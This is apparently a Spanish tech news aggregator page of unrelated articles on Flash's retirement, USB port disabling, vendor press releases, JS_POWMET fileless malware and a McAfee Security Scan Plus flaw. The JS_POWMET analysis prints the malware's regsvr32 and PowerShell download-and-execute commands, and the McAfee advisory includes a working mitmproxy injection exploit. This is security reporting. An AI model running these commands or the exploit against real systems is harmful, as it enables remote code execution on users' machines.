Navegadores inseguros. Los tiempos están cambiando.

Hace unos días nos llegó la noticia de la propia Adobe: Flash se acaba en 2020. Listo. Fin de una era. Aunque en su nota de prensa no mencionan ni de pasada las 1033 vulnerabilidades de seguridad (casi todas de máxima gravedad) que salen en una búsqueda rápida, Adobe alega únicamente un cambio de rumbo en la tecnología hacia estándares más abiertos, tales como HTML5 y WebGL.

Lo de Flash era una muerte anunciada. No podía ser de otro modo. Arrinconado por las vulnerabilidades, autentica puerta de entrada de toda clase de malware, y denostado por los buscadores, Flash fue reduciendo su masa de usuarios, desarrolladores y navegadores que lo soportan. Es incontable la cantidad de exploits que usan Flash como vector de explotación (junto con Adobe PDF Reader o Java, el tridente de la inseguridad). Es tal el ritmo de aparición de CVE sobre Flash que hasta dejaron de ser noticia.

Aunque Adobe fija su fin en 2020, todavía nos quedarán los rescoldos de una larga batalla por la expulsión de Flash del campo de juego del navegador. Engaños a usuarios desprevenidos (“pinche aquí amigo, instálese la última versión de Flash”, “Ah, ¿pero no había desaparecido?”, “pinche aquí amigo”, “vale, vale, pincho”) o navegadores sin actualizar. Sorprende que incluso con la política de actualizaciones automáticas todavía hay usuarios que no reinician el navegador para aplicarlas. Eso nos deja una pequeña rendija abierta en la ventana de exposición.

Flash no se queda solo. Los lectores de PDF incrustados en el navegador van siendo desplazados por el propio lector hecho en Javascript (no es broma, hecho en puro Javascript). Esto permite cerrar la vía a esos auténticos monstruos salidos de la mente de un escritor pasado de absenta que son los complementos nativos, auténticos quebraderos de cabeza de la navegación segura.

Otro que va borrando su mala impronta es Java. Hace tiempo que fue noticia su práctico baneo por los principales navegadores, y su uso generalista se ve marginado a ciertas aplicaciones obsoletas y sin mantenimiento, por ejemplo, algunas webs gubernamentales en las que te exigen “INTERNET EXPLORER 5.5 o superior / Java RunTime Environment Sun Versión 1.4.2. o superior” (la cita es textual, de la página de un Ministerio). Quién ha instalado una máquina virtual con un Windows 2000 y Java 1.4 obsoletos para firmar digitalmente sabe de qué se está hablando. Ahora esa misma firma electrónica se efectúa en, sorpresa, Javascript.

¿Nos quedamos aquí?

Para nada. Si miramos las propias implementaciones de Javascript (o el propio Java) vemos otros de los grandes culpables de hacer saltar por los aires a los navegadores: C y C++. Estos lenguajes de programación fueron diseñados hace décadas, cuando la gente ni sospechaba de lejos la fiesta que podía armarte un simple memcpy con un inocente búfer y una cadena de entrada procedente de usuario. Eso y la falta (necesaria) de un recolector de basura, hacía que la gestión de memoria fuera un desastre en manos de gente sin experiencia, con prisas o con las dos mencionadas condiciones a la vez.

C++ es un lenguaje complejo, muy complejo. Tanto que los propios expertos reconocen que es imposible aprender completamente cada una de sus características, o que es casi imposible crear un intérprete (parser) de la gramática completa (ver pag. 147). Aunque las nuevas versiones del estándar han reducido enormemente la capacidad de crear errores en la gestión de memoria, gracias a los punteros “inteligentes” (shared_ptr, unique_ptr, (ojo, no auto_ptr)), el daño ya está hecho. Además, incluso con estas mejoras, es complicado encontrar desarrolladores con un buen nivel en este lenguaje.

Vemos un comienzo en la evolución en este campo: nuevos lenguajes de programación, adaptados a los requisitos de seguridad y amigables para atraer nuevos programadores. Desde la propia Mozilla, han diseñado un lenguaje que permite obtener buenos tiempos de ejecución sin necesidad de gestión manual de la memoria: Rust. Este lenguaje les ha permitido reemplazar componentes de Firefox que anteriormente estaban hechos en C++ a otros en Rust, como por ejemplo Servo o Quantum. Es previsible que de manera progresiva se vayan adaptando más partes a este nuevo lenguaje si les acompañan los buenos resultados en rendimiento y desarrollo.

Como vemos, no hay nada escrito en piedra. Poco a poco se vencen antiguos paradigmas, modelos obsoletos y se cierran viejas heridas. Naturalmente, no vamos a dejar de ver exploits. Tan pronto como las antiguas técnicas dejen de ser efectivas se investigarán otras que den resultados similares. Además, y lo más importante, aunque reduzcamos la superficie de ataque, cerremos la ventana de exposición y creemos nuevos lenguajes más seguros, jamás podremos eliminar el componente más vulnerable de todo el sistema: el usuario.

 

Más información:

flash & the future of interactive content

https://blogs.adobe.com/conversations/2017/07/adobe-flash-update.html

Activar y desactivar los puertos USB

Cómo activar y desactivar los puertos USB

Las memorias USB y dispositivos MP3 o MP4 son usados por empleados o estudiantes en la escuela, universidad y oficinas. Algunas veces estos dispositivos portátiles pueden ser dañinos para los PC si están infectados por virus o programas malévolos.

Puedes prevenir algún posible daño al PC desactivando los puertos USB en el Editor del Registro de Windows. Para ello, haz clic en Inicio y luego en Ejecutar, escribe regedit para abrir el Editor del Registro y después haz clic en Aceptar. A continuación, busca el registro:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor

Haz clic derecho en Start y selecciona Modificar. En el campo Información del valor, escribe 4, haz clic en Hexadecimal y luego haz clic en Aceptar:


Cierra el Editor del Registro y reinicia tu PC.

Para activar el acceso a los puertos USB, sigue las instrucciones anteriores, pero en vez de 4 ingresa 3 en el campo Información del valor.

Dell actualiza su Endpoint Security Suite Enterprise

El objetivo es responder a la necesidad de los sectores de seguridad elevada de mantener sus endpoints aislados de Internet y aun así poder implementar una solución de protección avanzada contra amenazas.

La solución integra tecnología Cylance mediante inteligencia artificial y modelos matemáticos predictivos para ayudar a proteger contra malware y amenazas persistentes avanzadas. Las organizaciones que implementan soluciones de aislamiento con frecuencia no pueden aprovechar las tecnologías de seguridad más recientes porque se basan en conexiones en la nube. Dell trabajó en estrecha relación con Cylance para posibilitar a estas organizaciones aprovechar las tecnologías de protección avanzada contra amenazas de última generación mediante la creación de una solución de seguridad en las instalaciones que no requiere conexión a Internet.

Desde departamentos de gobierno a organizaciones de defensa, infraestructura crítica o el sector de la energía y exploración, en la actualidad hay muchas organizaciones que trabajan con información altamente confidencial y para las que la protección de la seguridad y la integridad de sus datos son de suma importancia. Asimismo, muchas de estas organizaciones pueden encontrarse en ubicaciones remotas, como instalaciones militares o plataformas de extracción de petróleo en altamar, donde es esencial contar con una solución en las instalaciones. Las instituciones que operan en modo de aislamiento total también necesitan protección contra amenazas maliciosas, ya sea que se trate de ataques de día cero, amenazas internas, ataques maliciosos basados en USB (basados en la transferencia manual de las amenazas) u otras vulnerabilidades. En el panorama de amenazas de rápida evolución –y crecimiento– de hoy, las organizaciones necesitan mantenerse por delante de los vectores de amenaza y adoptar soluciones de seguridad más avanzadas sin entorpecer su productividad ni su departamento de TI.

“Las organizaciones muy reguladas y las agencias del gobierno necesitan implementar soluciones de aislamiento para proteger sus datos confidenciales, pero no han podido aprovechar lo último en tecnología de la seguridad que requiere conexiones en la nube”, explicó Brett Hansen, vicepresidente de Endpoint Data Security and Management de Dell. “Desde Dell, respondemos a estas necesidades con la adaptación de nuestra solución emblemática Endpoint Security Suite Enterprise para ambientes aislados en las instalaciones, que proporciona a estas organizaciones una solución de protección avanzada contra amenazas a la que hasta ahora no podían tener acceso”.

Con el lanzamiento de la solución de aislamiento, Dell Endpoint Security Suite Enterprise ahora puede funcionar en tres modos según las necesidades individuales de la organización: el modo original, donde el cliente usa una conexión a Internet para comunicarse con la nube y obtener información de amenazas y actualizaciones; el modo de red en las instalaciones, donde el cliente se conecta a un servidor que se encuentra en las instalaciones para el cumplimiento de políticas y utiliza herramientas estándares de distribución de software (por ejemplo, SCCM) para actualizar los clientes; o el modo de aislamiento total.

Las organizaciones que necesitan aislar sus datos críticos de la red o las conexiones a Internet pueden hacer lo siguiente:

  • Defenderse de amenazas externas e internas: Al implementar un único conjunto de aplicaciones con protección avanzada contra amenazas y cifrado de datos, las organizaciones con niveles de seguridad elevados pueden defenderse de amenazas externas, como ataques de día cero, y amenazas internas, como conexiones USB maliciosas, y, a la vez, proteger sus datos con el cifrado de Dell.
  • Simplificar el mantenimiento: Los modelos matemáticos que se utilizan para detectar anomalías solo se deben actualizar unas pocas veces por año, lo que reduce ampliamente el nivel de soporte de TI requerido. En contraste, las soluciones antivirus tradicionales basadas en firmas requieren actualizaciones continuas y su mantenimiento consume muchos recursos en ambientes aislados.
  • Consolidar la administración con el cumplimiento de normas: El departamento de TI puede administrar con facilidad la política del agente y acceder a la actualización del agente como actualización fuera de línea. La solución también proporciona acceso a informes de amenazas optimizados y un tablero de gráficos de actividad de amenazas para facilitar la administración y el seguimiento.

Además de las características de protección avanzada contra amenazas, Dell Endpoint Security Suite Enterprise también incluye cifrado de datos a nivel de archivo, lo que proporciona un enfoque basado en políticas para proteger datos en cualquier dispositivo, medios externos o servicios de almacenamiento en la nube pública. Permite al departamento de TI aplicar con facilidad políticas de cifrado para múltiples endpoints y sistemas operativos sin afectar la productividad del usuario final. La solución también incorpora filtrado de protección web para ayudar a detener ataques dirigidos que evaden las defensas tradicionales, como el filtrado de URL y las firmas antivirus.

Disponibilidad

Dell Endpoint Security Suite Enterprise está disponible ahora para equipos Dell comerciales y como solución de seguridad en ambientes de TI heterogéneos en EE. UU. y países selectos de todo el mundo.

Oracle presenta aplicaciones de Nube de última generación

Anunció nuevas capacidades en su presentación de la versión 13 de las aplicaciones SCM, CX, ERP y HCM de Oracle Cloud, que apuntan a mejorar la experiencia de usuario. El detalle de las mejoras.

Las innovaciones en esta nueva versión de la suite de aplicaciones de Nube apuntan a mejorar la experiencia del usuario y otorgarles poder en todos los aspectos de la organización, que incluyen a profesionales de cadena de suministros, experiencia del cliente, finanzas y recursos humanos.

La más reciente versión incluye nuevas capacidades y mejoras en Oracle Supply Chain Management (SCM) Cloud, Oracle Customer Experience (CX) Cloud Suite, Oracle Enterprise Resource Planning (ERP) Cloud y Oracle Human Capital Management (HCM) Cloud.

En lo que respecta a Oracle SCM Cloud, la versión 13 introduce más de 200 características y seis productos nuevos que cubren planificación de ventas y operaciones, gestión de demanda, planificación de suministro, colaboración, gestión de calidad y mantenimiento.

Por otra parte, la nueva versión de Oracle CX Cloud Suite presenta innovaciones a Oracle Sales Cloud, que incluyen capacidades móviles y de visualización de datos mejoradas, así como otras que incrementan la productividad de los representantes de ventas.

Asimismo, la compañía introdujo Oracle Engagement Cloud, una nueva solución que combina capacidades de ventas y servicio para permitir a las organizaciones incrementar la satisfacción y lealtad del cliente, además de las oportunidades de escalar la oferta.

En cuanto a Oracle ERP Cloud, busca ayudar a las organizaciones a acelerar la innovación a través de una funcionalidad de dominios más profunda, que incluyeDynamic Discounting y Multi-Funding. Asimismo, ofrece cobertura para industrias como la educación superior, los servicios financieros y la manufactura, así como una expansión de la localización en Brasil e India.

Finalmente, según informó Oracle, el 80% de las mejoras de la última versión de HCM Cloud están centradas en el cliente Además, introduce una mayor personalización de experiencia de usuario y de manejo de marca, así como soporte adicional de localización de primer nivel.

También incluye capacidades mejoradas para apoyar las necesidades de clientes que tienen fuerzas de trabajo sindicalizadas, como comercios minoristas o empresas del sector salud con modelos laborales flexibles.

“Estamos comprometidos con ayudar a las organizaciones de todos tamaños a transformar sus funciones empresariales críticas para impulsar su crecimiento y mantenerse competitivas”, señaló Steve Miranda, vicepresidente Ejecutivo de Desarrollo de Aplicaciones en Oracle. “Con la más reciente versión de las aplicaciones de Oracle Cloud, presentamos cientos de innovaciones. Las nuevas actualizaciones incluyen importantes mejoras a la suite de gestión de la cadena de suministro que ayudarán a los clientes a crear cadenas inteligentes, conectadas y centradas en el cliente. Asimismo, presentamos una solución completamente nueva que enriquece la experiencia del usuario al cerrar la brecha entre las ventas y el servicio al cliente. La nueva versión también incluye mayores avances a la experiencia de usuario y cambios dirigidos al cliente para recursos humanos y finanzas”.

JS_POWMET: Malware sin malware

El pasado 24 de julio el equipo de Trend Micro anunciaba la detección deJS_POWMET, un malware completamente “fileless” que realiza toda su actividad desde la memoria, sin escribir ni dejar rastro en el disco duro de la víctima.

¿QUÉ ES EL MALWARE “FILELESS”?

Fileless malware, o malware sin ficheros, es un tipo de malware que se instala y se ejecuta en memoria. No necesita escribir ningún dato en el disco duro de la víctima para ejecutar su payload, lo que dificulta enormemente su detección.

Este tipo de familias se conocen como “Advanced Volatile Threats (AVT)” y suelen estar orientadas al robo de información valiosa y propiedad intelectual de empresas, bancos y gobiernos.

ANTECEDENTES

Este concepto de malware “sin ficheros” no es nuevo. De hecho el primer “fileless malware” data de 1987: conocido como Lehigh, infectaba el fichero COMMAND.COM y se instalaba en la memoria. Desde allí buscaba otros ficheros COMMAND.COM y los infectaba. Cuando había realizado cuatro infecciones sobreescribía el sector de arranque y la tabla de asignación de archivos.

La mayoría de esta clase de virus terminan realizando algún tipo de escritura en disco cuando ejecutan su payload. Son sólo “fileless” durante la fase de infección.

JS_POWMET sin embargo no realiza ninguna escritura durante su ciclo de vida, lo que lo hace particularmente interesante.

CÓMO FUNCIONA JS_POWMET

El virus llega al sistema a través de un malware intermedio que añade una entrada al registro de arranque de Windows:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
COM+ = “regsvr32 /s /n /u /i:{URL al XML malicioso} scrobj.dll”

Este comando ejecutará cada vez que se inicie la máquina un Javascript malicioso contenido en un XML remoto, sin necesidad de guardarlo en el disco duro.

Una vez ejecutado, JS_POWMET descargará el fichero “TROJ_PSINJECT“, un script para Powershell que descargará y desencriptará otro fichero: “favicon” desde la URL https://bogerando.ru/favicon.

%System%\WindowsPowerShell\v1.0\powershell.exe -nop -ep Bypass -noexit -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; iex ((New-Object System.Net.WebClient).DownloadString(‘https://{BLOCKED}ndo.ru/p1’));

Una vez descifrado, el fichero “favicon” se inyectará por medio de “ReflectivePELoader” en el proceso “TROJ_PSINJECT“, todo esto sin guardar ningún fichero al disco duro.

A continuación el malware volverá a descifrar el fichero “favicon” utilizando una clave RC4 hardcodeada en el código del virus. Esto da lugar a una nueva DLL maliciosa, “BKDR_ANDROM” que se inyectará en el proceso que ejecuta Powershell.

BKDR_ANDROM recopilará información sensible sobre el sistema y la enviará al C&C antes de cerrar todos los procesos powershell.exe y borrar todo rastro del virus.

CONTRAMEDIDAS

Como contramedidas se propone utilizar sistemas basados en contenedores en los puntos más críticos de la red.

MÁS INFORMACIÓN

A Look at JS_POWMET, a Completely Fileless Malware
http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/

JS_POWMET.DE

Ejecución remota de comandos en McAfee Security Scan Plus

Una vulnerabilidad en McAfee Security Scan Plus podría permitir la ejecución de cualquier ejecutable residente con los privilegios del usuario del sistema.

McAfee Security Scan Plus es una herramienta de diagnóstico gratuita que permite comprobar el estado de la protección del equipo, determinando si existen soluciones antivirus, cortafuegos y seguridad Web instaladas,

activas y actualizadas, y también analiza las amenazas en cualquier programa abierto.

McAfee Security Scan Plus obtiene información promocional procedente de diferentes dominios ‘mcafee.com’ y la muestra en la interfaz de usuario, normalmente en la ventana principal de la aplicación.

La vulnerabilidad, a la que se le ha asignado el identificador CVE-2017-3897, está causada por los siguientes factores:

  • La información se obtiene a través de HTTP en texto plano, por lo que podría ser modificada por un atacante remoto.
  • La aplicación McAfee Security Scan Plus confía en la librería ‘MCBRWSR2.DLL’ para mostrar contenido HTML. Esta librería expone la función javascript ‘LaunchApplication()’ que permite ejecutar comandos arbitrarios en el sistema. El siguiente ejemplo ejecutaría la calculadora de Windows (‘calc.exe’):

<script>window.external.LaunchApplication(“c:\\windows\\system32\\calc.exe”,
“”);</script>

Después de cada análisis del sistema, McAfee Security Scan Plus descarga un elemento que indica el nivel de protección. Aunque la respuesta original redirecciona a una URL HTTPs segura y los certificados de servidor son verificados por el cliente, sería posible a través de un ataque Man-in-the-Middle reemplazar este mensaje con una respuesta que contenga una llamada a la función ‘LaunchApplication()’. Esto permitiría ejecutar comandos con los permisos del usuario actual. Esta solicitud se realiza en cada análisis: tanto si es iniciado iniciado por el usuario
como de forma automática (por defecto se ejecuta semanalmente).

Existe una prueba de concepto escrita en python para esta vulnerabilidad:

#!/usr/bin/env python3
#
# HTTP proxy mode:
# mitmproxy -s mcsploit_inline.py –ignore ‘.*’
#
# Transparent proxy mode:
# mitmproxy -s mcsploit_inline.py -T
#

from mitmproxy import ctx, http
import requests
import time

COMMAND=”c:\\\\windows\\\\system32\\\\calc.exe”
CMDARGS=””

def response(flow):
if flow.request.scheme == “http” and
(flow.request.headers[‘host’].endswith(“mcafee.com“) or “mcafee” in
flow.request.url):
if flow.response.status_code == 302:
ctx.log(“[+] [MCSPLOIT] Insecure McAfee request found! (HTML)”)
https_url=flow.request.url.replace(“http://”,”https://”)

r=requests.get(https_url,headers=flow.request.headers,verify=False)
if “text/html” not in r.headers[‘content-type’]: return
contents=r.text

contents=contents.replace(“</head>”,”<script>try{window.external.LaunchApplication(\”%s\”,\”%s\”);}catch(launchapperr){var
x;}</script></head>” % (COMMAND, CMDARGS))
flow.response =
http.HTTPResponse.make(200,bytes(contents,encoding=”utf-8″),{“Content-Type”:
“text/html; charset=utf-8″,”Expires”:”-1″})
return
try:
if flow.response.headers[“content-type”] == “text/javascript”:
ctx.log(“[+] [MCSPLOIT] Insecure McAfee request found!
(JS)”)

inject=”try{window.external.LaunchApplication(\”%s\”,\”%s\“);}catch(launchapperr){var
x;}\n” % (COMMAND, CMDARGS)
try:
flow.response.contents = inject + flow.response.contents
except AttributeError:
ctx.log(“[-] [MCSPLOIT] No content in the original
response!”)
pass
except KeyError:
pass

McAfee Security Scan Plus puede ser descargado gratuitamente desde la página oficial de McAfee, pero también se distribuye junto a software de terceros, como una opción adicional -marcada por defecto- durante el proceso de instalación de dichos programas. Un ejemplo de esto es el plugin de Adobe Flash Player para los navegadores web (https://get.adobe.com/es/flashplayer/).

 

Esto significa que podrían existir equipos que cuenten con McAfee Security Scan Plus instalado sin que el usuario tenga conocimiento de ello (la instación está activada por defecto), lo que supondría un mayor riesgo para estos sistemas si no se actualizan para corregir el fallo de seguridad.

En el sitio oficial se encuentra disponible para su descarga la versión de McAfee Security Scan Plus 3.11.587.1 que corrige esta vulnerabilidad.

Más información:McAfee Security Scan Plus
https://home.mcafee.com/downloads/free-virus-scan

McAfee Security Scan Plus update fixes a potential man-in-the-middle
vulnerability (CVE-2017-3897)
https://service.mcafee.com/webcenter/portal/cp/home/articleview?articleId=TS102714

SSD Advisory – McAfee Security Scan Plus Remote Command Execution
https://blogs.securiteam.com/index.php/archives/3350

HP da a conocer las workstations móviles más seguras del mundo

Construida para visionarios creativos, la nueva línea de dispositivos HP ZBook ofrece el poder de una computadora de escritorio en un diseño móvil elegante.

Los nuevos dispositivos repletos de soluciones incluyen tecnología de pantalla premiada, gráficos 3D y poder de procesamiento en el nivel de servidor (todo en un diseño móvil compacto). Con su nueva línea de Workstations, HP continúa ofreciendo innovación de clase mundial para empoderar a cineastas, diseñadores, artistas, exploradores y otros pensadores visionarios.

“Como asociadas creativas de largo tiempo en la industria creativa, las Z Workstations se han ganado su posición como la máxima expresión en tecnología innovadora y confiable para creadores”, dijo Josh Peterson, vicepresidente de administración de producto de las Workstations Z. “Nuestras Workstations Móviles ZBook de 4ª Generación son las Workstations móviles más seguras y manejablesde la industria. Protegiendo la propiedad intelectual de creadores digitales de todo el mundo, HP hace posible que la industria creativa se enfoque en hacer que las mejores obras cobren vida sin tener que preocuparse por el robo o violaciones a la propiedad intelectual”.

HP está reinventando la seguridad de los dispositivos en sus Workstations Móviles ZBook de 4ª Generación proporcionando varias características de seguridad únicas, entre otras: HP Sure Start Gen3, el primer PC BIOS autorreparable de la industria con cifrado integral, sólida autenticación, protección contra malware, protección de datos, seguridad de identidad, y detección y respuesta ante amenazas.

HP está creando también dispositivos dinámicos de alto rendimiento que permiten a los usuarios perseguir su pasión y lograr sus metas sin tener que hacer compromisos de estilo o flexibilidad. Para facilitar el traslado a la realidad virtual, uno de los nuevos modelos de estaciones de trabajo puede ser configurado para visualizar el trabajo en una experiencia de realidad virtual sin ninguna complicación. La creación de RV (realidad virtual) para el consumidor se está volviendo rápidamente la dirección estratégica a seguir por muchas empresas, desde parques de diversiones hasta empresas automotrices, y HP ya comenzó a vender poderosas Workstations de escritorio con funcionalidad de realidad virtual en 2016.

Cuatro nuevos modelos: creá contenido en todo momento y en cualquier lugar, sin límites 

La HP ZBook Studio, estación de trabajo móvil prémium de HP creada para visionarios creativos entre los que se cuentan cineastas, arquitectos e ingenieros, ofrece ahora una duración de la batería de hasta 16,5 horas. La HP ZBook Studio ofrece poder emocionante que sólo se pensaría posible en una estación de trabajo de escritorio, en un diseño móvil elegante, moderno y deslumbrante, y ha sido construida meticulosamente con aluminio completamente desarrollado con máquina, bordes con corte diamante y una reluciente pantalla HP DreamColor 4K UHD que cuenta con 100% de soporte para Adobe® RGB. Con un espesor de tan sólo 18 mm y un peso inicial de 2,08 kilogramos, es posible experimentar el poder de la primera estación de trabajo Ultrabook™ Quad Core del mundo. Asimismo, la estación de trabajo ha sido diseñada por ingeniería con poderosos procesadores Intel® Xeon® de grado servidor o CoreTM de 7ª Generación, gráficos profesionales NVIDIA® Quadro® y hasta 2 TB de espacio de almacenamiento, dos unidades HP Z Turbo Drives4 y dos puertos Thunderbolt™ 3 que ofrecen un ancho de banda completo de 40 Gb/s.

La HP ZBook 17 ofrece la máxima potencia y rendimiento de HP. Está equipada con los más recientes procesadores Intel® Xeon® o CoreTM de 7ª Generación a elección del comprador, gráficos NVIDIA® Quadro® o AMD RadeonPro™, hasta 4 TB de espacio de almacenamiento, dos puertos Thunderbolt™ 3 y más. Asimismo, la HP ZBook 17 se puede configurar con poder de procesamiento y tarjetas gráficas óptimos para hacer que el contenido de realidad virtual cobre vida en una experiencia de 90 FPS sin contratiempos en dos opciones de tarjetas gráficas.

La HP ZBook 15 es utilizada por la NASA para extender las fronteras de la ciencia y los descubrimientos en la Estación Espacial Internacional. Las Workstations Móviles HP ZBook han sido sometidas a 120.000 horas de pruebas y están hechas para soportar cargas de trabajo demandantes con procesadores Intel® Xeon® o CoreTM de 7ª Generación, hasta con 3 TB de espacio de almacenamiento y gráficos NVIDIA® Quadro® o AMD RadeonPro™. HP realiza pruebas avanzadas y de referencia de desempeño para proveer una experiencia óptima con las aplicaciones más importantes de socios líderes en software como Adobe® y Autodesk.

La HP ZBook 14u es la estación de trabajo móvil más pequeña y ligera de HP. Esta estación de trabajo Ultrabook™ ofrece niveles extraordinarios de potencia y capacidad de gráficos en un diseño compacto con un espesor de tan sólo 22 mm y un peso de simplemente 1,63 kilogramos. Ofrece también impresionantes características de diseño, incluyendo una pantalla FHD de 14 pulgadas en diagonal con funcionalidad de tacto opcional, gráficos AMD FirePro™ 3D con 2 GB de memoria de video, los procesadores Intel® Core™ de 7ª Generación más recientes, hasta 32 GB de memoria y un máximo de 2 TB de espacio de almacenamiento. Además, está certificada para las principales aplicaciones de software, de modo que se puede trabajar más rápido con múltiples aplicaciones. Los usuarios que requieren una estación de trabajo Ultrabook con una pantalla de 15 pulgadas en diagonal pueden elegir la Estación de Trabajo HP ZBook 15uque se anunció recientemente.

Asimismo, las Workstations Móviles HP ZBook vienen precargadas con software HP Remote Graphics Software para colaboración remota, HP Performance Advisor para optimizar el desempeño y HP Velocity para un rendimiento confiable y rápido en una red. Las Workstations Móviles ZBook también están certificadas para ISV y han sido probadas con Estándares Militares (MIL_STD_810G).

Grupo Pelco gestionará 150 toneladas de residuos electrónicos

La empresa cerró contratos con HP y Lenovo para gestionar computadoras, impresoras y tabletas fuera de uso y extraer metales preciosos. Se estima que este nuevo negocio puede llegar a generar en un futuro mayor rentabilidad que la soja.

En la semana del Medio Ambiente, el Grupo Pelco firmó un contrato de prestación de servicios con las multinacionales HP y Lenovo para gestionar sus Residuos de Aparatos Eléctricos y Electrónicos (RAEEs) producidos en el país, con los más altos estándares de calidad.

En este sentido, se procesarán 150 toneladas de RAEEs al año provenientes de estas dos empresas. En las plantas del Grupo Pelco se desarmarán los dispositivos electrónicos (computadoras, impresoras, tabletas etc) para clasificarlos y disponerlos de la mejor manera. Además, las plaquetas de los aparatos serán exportadas a Bélgica, para extraer metales preciosos y  el resto de sus componentes se reciclan localmente.

“Estamos proyectando una segunda etapa de tratamiento, donde apuntamos a hacer la extracción de metales preciosos en el país. Pero para ello debemos recolectar como mínimo 500 toneladas anuales de plaquetas (insertas en los residuos electrónicos) y necesitamos que se regule esta nueva práctica, que puede dar cientos de puestos de trabajo y hasta en un futuro generar mayor rentabilidad que la soja”, destacó Claudia Kalinec, directora del Grupo Pelco.

Asimismo, la empresa tratadora se encarga de otorgarle a sus clientes, entre otros  Lenovo y HP, satisfacción en la gestión de sus RAEEs y que estos sean dispuestos correctamente con el menor impacto ambiental.

El futuro de las ventas minoristas sin filas para pagar

HP está reinventando la industria del comercio al por menor con la presentación de su innovador y versátil sistema Point-of-Sale (POS) que ofrece todo en uno: el HP ElitePOS.

La compañía está trabajando con clientes y socios líderes de ventas minoristas y de la industria de la hospitalidad para reinventar la forma en la que la tecnología puede transformar la experiencia en locales para los clientes.

Ahora que el comercio electrónico influye en la experiencia de compra de los consumidores, los minoristas deben asegurarse de que los agentes de venta se guíen por datos e información a fin de comprender mejor el comportamiento de compra y binden así la mejor experiencia posible para el cliente.

De acuerdo con InReality, el 69% de los compradores opinó que estarían más dispuestos a comprar en una tienda física si se les brindara acceso a herramientas digitales de autoservicio como pantallas y exhibidores interactivos.

Encontrar el equilibrio perfecto, donde la tecnología pueda contribuir a incrementar las ventas mientras se agilizan los procesos, resulta fundamental para el ambiente de los establecimientos comerciales en la actualidad.

“A medida que los minoristas buscan nuevas formas de interactuar con los consumidores, para reinventar las experiencias en las tiendas físicas, la tecnología debe fortalecer a los agentes de venta e involucrar a los clientes de una manera que se sienta como una extensión natural de la marca,” dijo Aaron Weiss, vicepresidente y gerente general de Retail para HP Inc. “La nueva solución de HP con ElitePOS está hecha para la versatilidad con un diseño fino y asombroso que se puede adaptar a múltiples ambientes de comercios y de la industria hotelera, a la vez que sigue ofreciendo la seguridad, el rendimiento y la durabilidad a largo plazo que nuestros clientes esperan de HP.”

El ElitePOS presenta un diseño modular impresionante, distinto a las terminales POS de gran tamaño, tipo caja, que se utilizan de manera común en las tiendas minoristas. Su diseño también es funcional y cuenta con soporte para uso más allá del proceso de pago, lo cual resulta en compras más rápidas y sencillas tanto para los clientes como para los agentes de ventas que los asisten. Estos casos de uso incluyen: señalización interactiva, asistencia del empleado y aplicaciones de autoservicio como un registro de cliente y el acceso a ofertas de productos adicionales en el llamado “endless aisle”.

Para los locales que quieren que el área de cajas esté limpia y ordenada, o que necesitan una mayor flexibilidad para la colocación de su terminal punto de venta, la pantalla puede separarse de la base de entrada y salida (I/O) a fin de lograr una máxima versatilidad en cuanto a su disposición.

Para los negocios que quieren que la tecnología complemente su experiencia de marca, el ElitePOS y sus accesorios aportan una mayor personalización y flexibilidad. Con especial atención a los detalles, incluida una impresora de recibos opcional que se integra en el pedestal de la columna, y un lector de banda magnética opcional integrado en el monitor, crea un área de caja limpia para el ambiente de los locales. El escáner de código de barras opcional y la impresora independiente combinan con la elegancia del ElitePOS para ofrecer una estética de diseño consistente a través de los equipos periféricos.

Los establecimientos comerciales y la industria hotelera suelen contar con ambientes exigentes y difíciles, que pueden perjudicar o destruir la tecnología enfocada en el consumidor. Es por ello que el ElitePOS está construido para tener una larga duración en las tiendas y está diseñado para aprobar las pruebas MIL-STD, prevenir los derrames canalizando el líquido hacia fuera del dispositivo y ofrecer un enfriamiento eficiente con ventilación lateral para una mayor fiabilidad. De manera adicional, las filas prolongadas dejan de ser un problema con Windows 10, una memoria rápida DDR4 y procesadores Intel® Core™ de 7a generación con tecnología vPro™.

“Mientras el comercio en tiendas minoristas y la industria hotelera experimentan un cambio revolucionario, el dispositivo de punto de venta será el centro fundamental para brindar la experiencia en tienda a los clientes,” dijo Leslie Hand, vicepresidenta de Retail Insights, IDC. “Pero con esta rápida transformación en los negocios digitales, también llega un aumento en las amenazas mediante ataques dirigidos y malware. Los sistemas de ventas al por menor POS, incluido el nuevo ElitePOS de HP, deben tener la capacidad para ofrecer un equilibrio entre las necesidades crecientes del cliente y de la marca, mientras actúan también como guardianes de la información sensible que pasa a través del dispositivo de manera diaria.”

Debido a que los dispositivos de punto de venta son cada vez más el objetivo de los hackers, la seguridad sigue siendo primordial para la industria del comercio minorista. De acuerdo con Verizon, el 64 por ciento de las violaciones a la seguridad en la industria del comercio minorista, que sufrió pérdida de datos, fue causado por intrusiones en los puntos de venta. Es por ello que HP está ampliando sus soluciones de seguridad líderes de la industria al ElitePOS tanto en hardware como con funciones de seguridad integradas en el software:

  • Dispositivo de seguridad a nivel BIOS para ofrecer protección en caso de un ataque de malware con HP Sure Start Gen3, el primer auto reparador de BIOS de la industria, y HP BIOSphere Gen3, los ecosistemas de firmware líderes de la industria.
  • Tecnología de autenticación de usuario, incluido un lector de huella digital opcional para un registro seguro; Credential Guard para una autenticación de usuario segura y protección de contraseña, y Device Guard que permite a los administradores de IT crear reglas para correr únicamente aplicaciones confiables, aprobadas y autorizadas, dentro del sistema POS para ayudar a protegerse de ataques walk-up y low-level a través de puertos USB.
  • Seguridad física del mismo dispositivo con una configuración de perno a mostrador opcional, funciones VESA de montaje K-Lock y un lector externo de huella digital para un inicio de sesión seguro a través de Windows Hello6.

CA: “Automic proporciona una habilidad para empoderar cualquier negocio“

ITware entrevistó a Kenneth Wilson, VP de Preventas en la unidad de negocios de CA para América, para conocer en detalle cómo la compañía mejora su propuesta de la mano de la tecnología de la empresa adquirida en enero de este año. “Tenemos la estrategia correcta para ser básicamente el jugador más poderoso en lo que respecta al avance de un mercado basado en las aplicaciones”, sostuvo. El análisis de la región.

